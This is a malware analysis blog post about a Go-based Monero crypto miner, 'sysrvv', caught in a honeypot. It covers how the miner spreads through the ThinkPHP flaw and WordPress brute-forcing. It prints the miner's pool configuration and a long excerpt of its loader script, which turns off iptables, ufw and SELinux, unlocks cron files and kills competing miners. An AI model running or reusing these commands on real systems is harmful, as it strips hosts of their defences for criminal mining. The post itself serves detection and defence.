Need cloud computing? Get started now

Dark background with blue code overlay
Blog
RSS

Another Golang Crypto Miner on the Loose

Larry Cashdollar

Written by

Larry Cashdollar

March 16, 2021

Larry Cashdollar

Written by

Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.

There are many crypto mining malware variants infecting systems on the internet. On Friday, March 4, 2021, I noticed an interesting hit in my honeypot logs.  The binary it captured stood out, as it was rather large at 4MB.  I immediately thought it would be a crypto miner written in the Go language. I was correct. This one however, has some newer exploits it's using for proliferation.

The malware attempted to exploit the ThinkPHP vulnerability in order to download and execute a script named ldr.sh. The loader script downloads the sysrvv binary and kills off other crypto miners.  It also adds a crontab that reinfects the system every 30 minutes using either wget, curl, or a php script instead of relying on one method of downloading the binary, and possibly failing if that utility doesn't exist.

The sysrvv binary is UPX packed meaning it's packed with the Ultimate Packer for Executables, a process where a binary is compressed but still executable using the UPX tool.  These are the unpacked stats:

  $ file sysrvv sysrvv: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped

 $ sha256sum sysrvv 47183b14ed24978643de4697abe917847831b1560256ddd76e44e918a6181fd8 sysrvv

 $ sha256sum sysrvv d3196b0b4767e86bf7e9e47722a5f733129c16f81f0ccbe5f822bdcfd778ca16 sysrvv 

The malware has recently been uploaded to virus total.

We are able to extract some of the details of the crypto mining pool using the strings command - a command line tool that extracts readable strings from a binary. This is helpful in tracking other malware that might be contributing to the same mining pool and therefore likely the same actor. We also can determine that they're mining Monero coins:

  "pools": [

 "algo": "rx/0",

 "coin": null,

 "url": "xmr-eu1.nanopool.org:14444", 

"user": 

"49dnvYkWkZNPrDj3KF8fR1BHLBfiVArU6Hu61N9gtrZWgbRptntwht5JUrXX1ZeofwPwC6fXNxPZfGjNEChXttwWE3WGURa%s", 

"pass": "x", 

"rig-id": null, 

"nicehash": false, 

"keepalive": true, 

"enabled": true, 

"tls": false, 

"tls-fingerprint": null, 

"daemon": false, 

"socks5": null, 

"self-select": null }, 

The malware attempts to kill off other crypto miners by removing their persistence and ease security restrictions by disabling SELINUX and iptables on the victim host.  It removes any other existing miners including ones hiding as docker images.

  if [ $(id -u) == 0 ]; then 

chattr -i /etc/ld.so.preload 

ufw disable 

iptables -F 

service iptables 

stop sysctl

 kernel.nmi_watchdog=0

 echo 0 >/proc/sys/kernel/nmi_watchdog

 echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf 

setenforce 0

 echo SELINUX=disabled > /etc/selinux/config 

sysctl -w vm.nr_hugepages=$(nproc --all) 

chattr -R -ia /var/spool/cron 

chattr -ia /etc/crontab 

chattr -R -ia /var/spool/cron/crontabs

 chattr -R -ia /etc/cron.d 

chattr -iua /tmp/ 

chattr -iua /var/tmp/

 killall log_rot 

ps aux | grep -v grep | egrep '2t3ik|qW3xT.2|ddg|./oka|postgres: .. . . /etc/ld.so.preload /etc/rc.d/init.d/kthrotlds /tmp/kthrotlds /usr/sbin/watchdogs /dev/shm/z3.sh /dev/shm/z2.sh /dev/shm/.scr /dev/shm/.kerberods /usr/bin/config.json /usr/bin/exin /usr/local/lib/libioset.so /etc/cron.d/tomcat /etc/rc.d/init.d/watchdogs docker ps | egrep 'pocosow|gakeaws|azulu|auto|xmr|mine|monero|slowhttp|bash.shell|entrypoint.sh|/var/sbin/bash' | awk '{print $1}' | xargs -I % docker kill % docker images -a | grep 'pocosow|gakeaws|buster-slim|hello-|azulu|registry|xmr|auto|mine|monero|slowhttp' | awk '{print $3}' | xargs -I % docker rmi -f % netstat -anp | egrep ':143|:2222|:3333|:3389|:4444|:5555|:6666|:6665|:6667|:7777|:8444|:3347|:14433' | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % crontab -r 

Redress is a tool for analyzing stripped Go binaries. Based on this output we have a catalog of vulnerabilities that are being used to spread this malware.

Table of exploits 

The following functions are also used to attempt a brute force login, based on a list of credentials stored in the malware binary. If access is gained, the malware attempts to upload a plugin or edit a theme.

   wordpress.(*wpExec).login

 wordpress.(*wpExec).exploitUploadPlugin Function to brute force login 

wordpress.(*wpExec).exploitWritableTheme 

wordpress.BruteXmlrpc 

wordpress.pwdByUsr 

A sample of strings from the function in the binary shows a list of credentials and a curl command with the user-agent set to curl_brute_wordpress.

What is interesting is that the malware appears to set the user-agent request header to the exploit name it's attempting. This could be a good way to determine if your system has been attacked or compromised by this particular piece of malware.

There appears to be additional functions to brute force JupyterLab Notebook credentials, I suspect in an attempt to run arbitrary commands on poorly secured notebooks.

Conclusion

Crypto mining software will continue to evolve and take advantage of the latest software vulnerabilities.  Software vulnerabilities like Command Injection and Remote Code Execution will continue to be valued by cyber criminals in order to monetize your CPU cycles. What we do know for sure is that criminals are updating their malware to use the latest exploits and this might mean older vulnerabilities are either being patched or are becoming a less reliable way to compromise systems. Again, the best course of action is keeping system software updated and using strong passwords with multi factor authentication. 



Larry Cashdollar

Written by

Larry Cashdollar

March 16, 2021

Larry Cashdollar

Written by

Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.